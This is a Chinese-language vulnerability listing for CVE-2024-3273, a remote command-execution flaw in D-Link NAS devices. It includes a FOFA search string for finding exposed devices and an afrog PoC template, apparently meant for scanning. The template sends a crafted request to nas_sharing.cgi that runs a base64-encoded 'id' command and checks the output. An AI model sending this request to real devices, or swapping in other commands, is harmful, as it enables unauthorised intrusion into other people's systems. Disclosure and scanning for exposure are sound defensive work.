CVE-2024-3273: D-LinkNAS RCE

日期: 2025-09-01 | 影响软件: D-Link NAS | POC: 已公开

漏洞描述

D-LinkNAS存在命令执行漏洞,可获取系统权限。 fofa: "Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"。

PoC代码[已公开]

id: CVE-2024-3273

info:
  name: D-LinkNAS RCE
  author: laohuan12138
  severity: critical
  verified: true
  description: |
    D-LinkNAS存在命令执行漏洞,可获取系统权限。
    fofa: "Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"。
  references:
    - https://mp.weixin.qq.com/s/I2HX82Y2fg5pekE0ktco0Q
    - https://github.com/netsecfish/dlink
  tags: cve,cve2024,rce
  created: 2024/04/12

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |-
        GET /cgi-bin/nas_sharing.cgi?cmd=15&passwd=&system=aWQ=&user=messagebus HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
        Accept-Encoding: gzip
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body) && response.body.bcontains(b"<auth_state>1</auth_state>")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2024/CVE-2024-3273.yaml

相关漏洞推荐